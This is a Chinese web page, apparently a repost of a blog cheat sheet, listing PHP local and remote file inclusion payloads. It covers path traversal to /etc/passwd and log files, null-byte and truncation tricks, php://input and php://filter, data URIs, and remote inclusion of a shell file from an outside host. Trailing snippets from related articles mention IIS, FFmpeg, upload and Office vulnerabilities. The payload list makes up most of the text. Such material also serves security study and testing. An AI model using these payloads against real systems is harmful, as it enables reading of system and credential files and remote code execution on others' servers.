关于PHP文件包含一些漏洞分析

基本的文件包含漏洞:

 代码如下 复制代码
<?php include(“includes/” . $_GET['file']); ?>
* 包含同路径下的文件:
?file=.htaccess
* 路径遍历:
?file=../../../../../../../../../var/lib/locate.db
(该文件非常有趣因为它允许你搜索文件系统)
* 包含注入PHP代码的文件:
?file=../../../../../../../../../var/log/apache/error.log
(you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.)

受限的本地文件包含:

 代码如下 复制代码
 <?php include(“includes/” . $_GET['file'] . “.htm”); ?>
* 空字符注入(Null Byte Injection):
?file=../../../../../../../../../etc/passwd%00
(需要magic_quotes_gpc=off)
* 列目录(Null Byte Injection):
?file=../../../../../../../../../var/www/accounts/%00
(仅限BSD, 需要magic_quotes_gpc=off,详细信息here)
*路径截断(Path Truncation):
?file=../../../../../../../../../etc/passwd........... …
(详细信息参见 here 和 here)
* 点号截断:
?file=../../../../../../../../../etc/passwd……………. …
(仅限Windows, 更多细节参见 here)

基本的远程文件包含:

 代码如下 复制代码

<?php include($_GET['file']); ?>

* 包含远程代码(Including Remote Code):

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(需要 allow_url_fopen=On 和 allow_url_include=On)

* 使用php输入流(Using PHP stream php://input):

?file=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)

* 使用PHP过滤函数(Using PHP stream php://filter):
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here)
* Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(需要 allow_url_include=On)

* 用于跨站脚本攻击(Using XSS):

 代码如下 复制代码
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or only whitelisted domains allowed)

受限的远程文件包含漏洞

 代码如下 复制代码
<?php include($_GET['file'] . “.htm”); ?>
* ?file=http://websec.wordpress.com/shell
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23
(需要 allow_url_fopen=On 和 allow_url_include=On)

静态远程文件包含漏洞:

 代码如下 复制代码

<?php include(“http://192.168.1.10/config.php”); ?>
* 中间人攻击(Man In The Middle)
(lame indeed, but often forgotten)

来自Reiners’ Weblog。

时间: 2024-10-23 19:57:45

关于PHP文件包含一些漏洞分析的相关文章

IIS 短文件和文件夹泄漏漏洞分析

"IIS 短文件和文件夹泄漏漏洞"最近被炒得很火热,因为像以前什么注入漏洞.跨站脚本攻击炒过了之后,自然要炒个新的概念出来才对得起买他们安全设备的客户. 其实这个的意思就是更方便猜测我们的网站上有哪些文件. 如果我们的网站文件不保密.如果我们的网站文件无漏洞,那这个就无所谓漏洞了. 其实就好像是做生意的,把门牌号贴到网上,并不算不安全. 但如果是个秘密基地,把门牌号贴到网上,就算不安全了. 当然安全厂商是不管这些的,好不容易抓住一个所谓的漏洞,当然要宣传宣传. 这个源由是 Window

FFmpeg任意文件读取漏洞分析

本文讲的是FFmpeg任意文件读取漏洞分析,6月24号的时候hackerone网站上公布了一个ffmpeg的本地文件泄露的漏洞,可以影响ffmpeg很多版本,包括3.2.2.3.2.5.3.1.2.2.6.8等等. hackerone网站上的漏洞介绍: https://hackerone.com/reports/226756.与之相关联的还有其他几篇hackerone上的漏洞报告:https://hackerone.com/reports/243470.https://hackerone.com

php文件上传漏洞简单分析

下面是一个简单的文件上传表单  代码如下 复制代码 <form action="upload.php" method="post" enctype="multipart/form-data" name="form1">   <input type="file" name="file1" /><br />   <input type="s

IIS短文件和文件夹泄漏漏洞的分析

IIS是有微软使用微软windows功能扩展模块创建的一套web服务器应用程序,是世界上第三个最流行的服务器. 漏洞描述: 漏洞研究小组发现了一个微软IIS的漏洞,攻击者可以利用一个包含"~"的get请求,来让服务器上的文件和文件夹被泄漏. 影响版本: IIS 1.0, Windows NT 3.51 IIS 2.0, Windows NT 4.0 IIS 3.0, Windows NT 4.0 Service Pack 2 IIS 4.0, Windows NT 4.0 Option

如何把本地文件包含变为远程文件包含漏洞

本文讲的是如何把本地文件包含变为远程文件包含漏洞, 本地文件包含(LFI)在Web渗透测试中时不时的会遇到,通过加强对LFI渗透测试技术的研究,可以帮助渗透测试人员在未来的渗透测试过程中,识别和测试LFI漏洞. 目前我已经找到了一种将LFI转换为多个Web框架的远程文件包含(RFI)的方法 由于我一直在评估一些开源软件,所以就会发现代码执行的一个方法就是依赖于我选择的驻留在Web服务器上的JAR文件.当以特定方式配置时,Web应用程序将加载JAR文件并在文件中搜索同类文件.有意思的是,在Java

一个云本地文件包含漏洞,影响世界一流公司

本文讲的是一个云本地文件包含漏洞,影响世界一流公司,先通过一张截图看一下影响范围吧 本地文件包含是在Oracle Responsys的云服务中存在的.什么是Responsys?它是企业级基于云的B2C系统.每个企业都会有他们独有的IP,以便他们登录到Responsys系统中,并且企业也不能和其他公司共享IP. 我是怎么发现这个漏洞的? 和往常一样我在挖洞,这时查看我邮箱发现"em.facebookmail.com"发送过来一封邮件.举个例子,在我的邮箱中,我收到的邮件是从fbdev@e

PHP 网络开发详解之远程文件包含漏洞_php技巧

以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能. 复制代码 代码如下: <?php $file_name = $_GET["filename"]; //获得当前文件名 include("$file_name "); //包含文件 //一些其他操作 ?> 这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能.例如,通过在浏览器上访问http://localhost/test.php?filename=myinc

ASP漏洞分析和解决方法

解决 ASP漏洞分析和解决方法 有人说一台不和外面联系的电脑是最安全的电脑,一个关闭所有端口,不提供任何服务的电脑也是最安全的.黑客经常利用我 们所开放的端口实施攻击,这些攻击最常见的是DDOS(拒绝服务攻击).下面我会列出ASP的二十几个漏洞,每个漏洞都会有漏洞描 述和解决方法. 1 在ASP程序后加个特殊符号,能看到ASP源程序 受影响的版本: win95+pws IIS3.0 98+pws4 不存在这个漏洞. IIS4.0以上的版本也不存在这个漏洞. 问题描述: 这些特殊符号包括小数点,%

又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文件的漏洞攻击的研究分析,其中一次属于零日漏洞攻击. 今年3月开始,FireEye再一次在微软Office产品中陆续发现三个新的零日漏洞,发现时这些漏洞已被野外利用. 第一个漏洞出现在今年的3月下旬,CVE-2017-0261中描述了Office远程代码执行漏洞(RCE)漏洞,FireEye认为该漏洞